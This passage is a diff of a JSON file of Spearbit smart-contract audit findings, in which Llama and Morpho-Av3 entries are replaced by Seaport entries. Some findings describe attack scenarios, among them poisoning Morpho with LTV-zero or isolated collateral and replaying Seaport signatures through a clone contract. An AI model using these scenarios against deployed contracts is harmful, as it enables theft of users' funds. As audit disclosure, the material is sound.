address(0) for match orders.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Consider making the delegate-call scripts functions only callable by delegate-call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "An additional safety check could be added to scripts if a function should be only callable via a delegate-call.", + "title": "availableOrders[i] return values need to be explicitly assigned since they live in a region of memory which might have been dirtied before", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport 1.1 did not have the following default assignment: if (advancedOrder.numerator == 0) { availableOrders[i] = false; continue; } But this is needed here since the current memory region which was previously used by the accumulator might be dirty.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Missing tests for SingleUseScript.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "There are no tests for SingleUseScript.sol in Llama.", + "title": "Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Usage of MemoryPointer / formatting is inconsistent between the loop used OfferItems and the loop used for ConsiderationItems.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Role not available to Guards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Use cases where Guards require knowing the creation or approval role for the action are not sup- ported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies.", + "title": "newAmount is not used in _compareItems", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "newAmount is unused in _compareItems. If originalItem points to I = (t, T , i, as, ae) and the newItem to Inew = (t 0, T 0, i 0, a0 s, a0 e) where parameter description t 0 t T , T 0 i 0 i as, a0 s ae, a0 e c then we have itemType itemType for I after the adjustment for restricted collection items token identifierOrCriteria identifierOrCriteria for I after the adjustment for restricted collection items startAmount endAmount _compareItems c(I, Inew ) = (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) and so we are not comparing either as to a0 enforced. In _getGeneratedOrder we have the following check: as > a0 errorBuffer. inequality is reversed for consideration items). And so in each loop (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) _ (as > a0 s or a0 s to a0 e. In abi_decode_generateOrder_returndata a0 s = a0 e is s (invalid case for offer items that contributes to s) is ored to errorBuffer.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Global guards are not supported", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Other protocols use of guards applies them to the account (i.e. globally). In other words, if global guards existed and if there are some properties you know to apply to the entire LlamaCore instance a global guard could be applied. The current implementation allows granular control, but it also requires granular control with no ability to set global guards.", + "title": "reformat validate so that its body is consistent with the other external functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "For consistency with other functions we can rewrite validate as: function validate( Order[] calldata /* orders */ ) external override returns (bool /* validated */ ) { return _validate(to_dyn_array_Order_ReturnType( abi_decode_dyn_array_Order )(CalldataStart.pptr())); } Needs to be checked if it changes code size or gas cost. Seaport: Fixed in PR 824. Spearbit: Verified.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Consider using _disableInitializers in constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "OpenZeppelin added the _disableInitializers() in 4.6.0 which prevents initialization of the im- plementation contract and recommends its use.", + "title": "Add commented parameter names (Type Location /* name */)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Add commented parameter names (Type Location /* name */) for validate: Order[] calldata /* orders */ Seaport: Fixed in commit 74de34. Spearbit: Verified.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Revoking and setting a role edge cases", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "This issue highlights a number of edge-case behaviors 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_- HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): Alice is given role 1 with expiry. Expiry passes. Anyone calls revokeExpiredRole. Role is revoked but Alice still has balanceOf == 1. LlamaCore later calls revokePolicy with roles array of [2]. A role Alice never had is revoked. The NFT is burned.", + "title": "Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Need to have height h provided to _lookupBulkOrderTypehash such that: 1 + 32(h (cid:0) 1) 2 [0, min(0xffffffffffffffff, typeDirectory.codesize) (cid:0) 32] Otherwise typeHash := mload(0) would be 0 or would be padded by zeros. When extcodecopy gets executed extcodecopy(directory, 0, typeHashOffset, 0x20) clients like geth clamp typehashOffset to minimum of 0xffffffff_ffffffff and directory.codesize and pads the result with 0s if out of range. ref: instructions.go#L373 62 common.go#L54", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Use built in string.concat", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...). The client notes there are no gas implications of this change while the change does offer semantic clarity.", + "title": "Unused imports can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The imported contents in this context are unused.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Inconsistencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Throughout the codebase, we've encountered some inconsistencies that we decided to point out. for(uint256 i = 0... is not used everywhere e.g. AbsoluteStrategy.sol#L130 Sometimes, a returned value is not named. e.g. named return value function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { unnamed return value function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { Missing NatSpec on various functions. e.g. LlamaPolicy.sol#L102 _uncheckedIncrement is not used everywhere. Naming of modifiers In all contracts the onlyLlama modfiier only refers to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry which has the same name but refers to llamaCore and rootLlama but is called onlyLlama. See LlamaPolicyMetadataParamRegistry.sol#L16 Console.log debug output in RelativeStrategy console.log in RelativeStrategy See: RelativeStrat- egy.sol#L215 In GovernanceScript.sol both of SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs over inheriting all structs from lib/Structs.sol: LlamaAccount GovernanceScript LlamaPolicy Recommend removing duplicate structs and, where relevant, continue making use of the shared Structs.sol for struct definitions.", - "labels": [ + "title": "msg.sender is provided as the fulfiller input parameter in a few locations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "msg.sender is provided as the fulfiller input parameter.", + "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Policyholders with large quantities may not both create and exercise their large quantity for the same action", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action.", + "title": "Differences and similarities of ConsiderationDecoder and solc when decoding dynamic arrays of static/fixed base struct type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The way OfferItem[] in abi_decode_dyn_array_OfferItem and ConsiderationItem[] in abi_- decode_dyn_array_ConsiderationItem are decoded are consistent with solc regarding this: For dynamic arrays of static/fixed base struct type, the memory region looks like: 63 [mPtrLength --------------------------------------------------- [mPtrLength + 0x20: mPtrLength + 0x40) : mPtrLength + 0x20) arrLength memberTail1 - a memory pointer to the array's 1st element ,! ... [mPtrLength + ...: mPtrLength + ...) memberTailN - a memory pointer to the array's Nth element ,! --------------------------------------------------- [memberTail1 ... [memberTailN : memberTail1 + ) element1 : memberTailN + ) elementN The difference is solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element). ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "The roleBalanceCheckpoints can run out of gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This check will copy into memory the whole history which can end up in a out of gas error. This is an informational issue as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit.", + "title": "PointerLibraries's malloc skips some checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. Solidity does the following when allocating memory: 64 function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload() } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_() } mstore(, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_() { // = cast sig \"Panic(uint256)\" mstore(0, ) mstore(4, ) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPol- icy.revokeExpiredRole from EOA", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "GovernanceScript.revokeExpiredRoles is intended to be delagate called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call directly from an EOA or batching a multicall, again from an EOA.", + "title": "abi_decode_bytes can populate memory with dirty bytes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes. So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or 65 cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word).", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "The InvalidActionState can be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Currently, the InvalidActionState includes the expected state as an argument, this is unnecessary as you can derive the state from the method call, would make more sense to take the current state instead of the expected state.", + "title": "abi_encode_validateOrder reuses a memory region", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFul- fillmentFromCalldata(...) needs to be called to populate the memory region that is used for event OrderFul- filled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken to not modified that region. accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "_uncheckedIncrement function written in multiple contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Multiple contracts make use of an _uncheckedIncrementfunction and each duplicates the function definition. Similarly the slot0 function appears in both LlamaAccount and LlamaCore and _toUint64 appears in the two strategy contracts plus LlamaCore.", + "title": "abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and \"pure\" supply), borrow and liquidate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert. 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert. Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply Morpho's users could not be able to borrow Morpho's users could not be able to liquidate Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0", + "title": "Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, bor- row and liquidate operations could stop working", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral and the victim will suffer from all the side effects previously explained. While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply. 6 Morpho's users could not be able to borrow. Morpho's users could not be able to liquidate. Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.", + "title": "The compiled YUL code includes redundant consecutive validation of enum types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Half the location where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr)", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price which is different from the price that Aave would use.", + "title": "Consider writing tests for revert functions in ConsiderationErrors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Isolated assets are treated as collateral in Morpho", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract is intended not to be in isolation mode to avoid its restrictions. Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them which should not be possible: Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave.", + "title": "Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Minor typo in comments: // Write ratifyOrder selector and get pointer to start of calldata dst.write(validateOrder_selector);", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho is handling it in the _assetLiquidityData function function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { ,! } // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. // In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user Health Factor. The Health Factor is used to Calculate both if a user can be liquidated and in which percentage the collateral can be seized. Calculate if a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= of liquidationThreshold, this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to Deny a user's collateral withdrawal (while an Aave user could have done it). Deny a user's borrow (while an Aave user could have done it). Make a user liquidable (while an Aave user could have been healthy). Increasing the possibility to allow the liquidator to seize the full collateral of the borrower (instead of 50%). 9", + "title": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constrainsts.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints. This is the case when errorBuffer !=0 and revertOnInvalid == false (ful- fillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have incremented more than 1.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk MorphoInternal.sol#L324," + "Seaport", + "Severity: Informational" ] }, { - "title": "RewardsManager does not take in account users that have supplied collateral directly to the pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral.", + "title": "Users need to be cautious about what proxied/modified Seaport or Conduit instances they approve their tokens to", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport ( S ) uses EIP-712 domain separator to make sure that when users sign orders, the signed orders only apply to that specific Seaport by pinpointing its name, version, the chainid, and its address. The domain separator is calculated and cached once the Seaport contract gets deployed. The domain separator only gets recalculated when/if the chainid changes (in the case of a hard fork for example). Some actors can take advantage of this caching mechanism by deploying a contract ( S0 ) that : Delegates some of its endpoints to Seaport or it's just a proxy contract. Its codebase is almost identical to Seaport except that the domain separator actually replicates what the original Seaport is using. This only requires 1 or 2 lines of code change (in this case the caching mechanism is not important) function _deriveDomainSeparator() { ... // Place the address of this contract in the next memory location. mstore(FourWords, MAIN_SEAPORT_ADDRESS) // <--- modified line and perhaps the actor can define a ,! named constant Assume a user approves either: 1. Both the original Seaport instance and the modified/proxied instance or, 2. A conduit that has open channels to both the original Seaport instance and the modified/proxied instance. And signs an order for the original Seaport that in the 1st case doesn't use any conduits or in the 2nd case the order uses the approved conduit with 2 open channels. Then one can use the same signature once with the original Seaport and once with the modified/proxied one to receive more tokens than offerer / user originally had intended to sell.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Accounting issue when repaying P2P fees while having a borrow delta", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee.", + "title": "ZoneInteraction contains logic for both zone and contract offerers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ZoneInteraction contains logic for both zone and contract offerers.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Repaying with ETH does not refund excess", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined.", + "title": "Orders of CONTRACT order type can lower the value of a token offered", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerer, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders the only way to ensure that the recipient of the item will hold a token which value hasn't depreciated during the transaction is that the recipient would also need to use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho can end up in isolation mode", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract has a single Aave position for all its users and does therefore not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: Up to deployment, an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment. This attack also works if Morpho does not intend to create a market for the isolated asset. Upon deployment and market creation: An attacker or unknowing user is the first to supply an asset and this asset is an isolated asset, Morpho's Aave position automatically enters isolation mode. At any time if an isolated asset is the only collateral asset. This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance.", + "title": "Restricted order checks in case where offerer and the fulfiller are the same", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport 1.2 disallowed skipping restricted order checks when offerrer and fulfiller are the same. Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. However, in the case of the offerer == 